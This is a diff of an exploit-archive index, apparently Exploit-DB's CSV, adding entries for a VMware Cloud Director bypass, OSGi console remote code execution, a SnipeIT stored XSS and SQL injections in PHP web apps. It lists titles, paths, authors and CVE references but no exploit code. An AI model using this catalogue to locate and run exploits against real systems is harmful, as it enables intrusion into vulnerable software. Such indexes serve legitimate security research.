 15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
+51882,exploits/multiple/remote/51882.py,"VMware Cloud Director 10.5 - Bypass identity verification",2024-03-12,"Abdualhadi khalifa",remote,multiple,,2024-03-12,2024-03-12,0,,,,,,
 28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple,,2006-07-31,2013-09-15,1,CVE-2006-2481;OSVDB-27695,,,,,https://www.securityfocus.com/bid/19249/info
 28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple,,2013-10-14,2013-10-14,1,OSVDB-98804;CVE-2013-6366,"Metasploit Framework (MSF)",,,,
 33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple,,2009-10-27,2014-05-12,1,CVE-2009-3733;OSVDB-59440,,,,,https://www.securityfocus.com/bid/36842/info
@@ -12112,6 +12114,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",2021-11-29,"Hubert Wojciechowski",webapps,multiple,,2021-11-29,2021-11-29,0,,,,,http://www.exploit-db.comos-php72-setup.zip,
 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
+51879,exploits/multiple/webapps/51879.py,"OSGi v3.7.2 (and below) Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
+51878,exploits/multiple/webapps/51878.py,"OSGi v3.8-3.18 Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
@@ -12210,6 +12214,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
 49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
+51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
 43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10
 48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
@@ -15830,6 +15835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
 21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
 51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
+51880,exploits/php/webapps/51880.txt,"Client Details System 1.0 - SQL Injection",2024-03-12,"Hamdi Sevben",webapps,php,,2024-03-12,2024-03-12,0,,,,,,
 41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
 48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@@ -19721,6 +19727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
+51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
 51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,